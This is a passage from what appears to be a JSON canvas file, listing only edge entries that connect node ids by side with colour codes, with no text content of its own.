		{"id":"01b903d3fe614f04","fromNode":"371b1b37981f41b3","fromSide":"bottom","toNode":"e2d5e5607533f2fe","toSide":"left","color":"1"},
		{"id":"ec8b4796bb2ec5f5","fromNode":"dd88462ff5f0bb21","fromSide":"top","toNode":"371b1b37981f41b3","toSide":"bottom","color":"6"},
		{"id":"631ae9fa8bdaba93","fromNode":"6040b032c88aaf14","fromSide":"top","toNode":"371b1b37981f41b3","toSide":"bottom","color":"6"},
		{"id":"ace19d9102b1c5d2","fromNode":"e4a7357b63443fc7","fromSide":"top","toNode":"371b1b37981f41b3","toSide":"bottom","color":"6"},
		{"id":"484d2a62dc0556e6","fromNode":"c867dcbe12b58237","fromSide":"top","toNode":"371b1b37981f41b3","toSide":"left","color":"6"},
		{"id":"9e1433c13f8f5c65","fromNode":"d9a6c31d0937a051","fromSide":"right","toNode":"c867dcbe12b58237","toSide":"left","color":"#e179dd"},
		{"id":"64959535cf22a3cc","fromNode":"88cb0cd64ce5a5ff","fromSide":"top","toNode":"d9a6c31d0937a051","toSide":"bottom","color":"#6f4d4d"},
		{"id":"7be583b727c34d34","fromNode":"a6724c7c34def4f6","fromSide":"left","toNode":"e2d5e5607533f2fe","toSide":"top","color":"1"},
		{"id":"bf85371b02087c69","fromNode":"e2d5e5607533f2fe","fromSide":"right","toNode":"a6724c7c34def4f6","toSide":"bottom","color":"#3e1e09"},
		{"id":"d64f24ef9db4e89e","fromNode":"90562e5d23ab0f99","fromSide":"right","toNode":"88cb0cd64ce5a5ff","toSide":"left","color":"4"},
		{"id":"a70bea09d972e6a4","fromNode":"90562e5d23ab0f99","fromSide":"right","toNode":"e80b00b9c2b3c0e1","toSide":"left","color":"2"},
		{"id":"1659ae87b7e980b2","fromNode":"88cb0cd64ce5a5ff","fromSide":"bottom","toNode":"90562e5d23ab0f99","toSide":"bottom","color":"#1438a3"},
		{"id":"a638e78ca0be9136","fromNode":"665bffcbe7cba5e3","fromSide":"right","toNode":"e80b00b9c2b3c0e1","toSide":"left","color":"2"},
		{"id":"2406461147c7490d","fromNode":"665bffcbe7cba5e3","fromSide":"bottom","toNode":"e4a7357b63443fc7","toSide":"bottom","color":"#7906a2"},
		{"id":"e3efbf2371229000","fromNode":"665bffcbe7cba5e3","fromSide":"right","toNode":"6040b032c88aaf14","toSide":"left","color":"#16446f"},
		{"id":"61abb4d1e0727648","fromNode":"88cb0cd64ce5a5ff","fromSide":"bottom","toNode":"665bffcbe7cba5e3","toSide":"right","color":"3"},
		{"id":"a617938dd741f30e","fromNode":"88cb0cd64ce5a5ff","fromSide":"right","toNode":"e4a7357b63443fc7","toSide":"left","color":"#7906a2"},
		{"id":"30ba753f4d33b807","fromNode":"88cb0cd64ce5a5ff","fromSide":"right","toNode":"6040b032c88aaf14","toSide":"left","color":"#16446f"},
		{"id":"97bcbabe5f690e66","fromNode":"e80b00b9c2b3c0e1","fromSide":"top","toNode":"88cb0cd64ce5a5ff","toSide":"bottom","color":"4"},
		{"id":"a4881643c1e3d293","fromNode":"dd88462ff5f0bb21","fromSide":"right","toNode":"6040b032c88aaf14","toSide":"left","color":"#16446f"},
		{"id":"85c28c5bddb7a057","fromNode":"6040b032c88aaf14","fromSide":"right","toNode":"e2d5e5607533f2fe","toSide":"bottom","color":"1"},
		{"id":"11d33677acab107f","fromNode":"e4a7357b63443fc7","fromSide":"right","toNode":"e2d5e5607533f2fe","toSide":"bottom","color":"1"},
		{"id":"0ea71c2649e120ba","fromNode":"e2d5e5607533f2fe","fromSide":"bottom","toNode":"f6c1143c67c38824","toSide":"left","color":"#a6df77"}
	]
}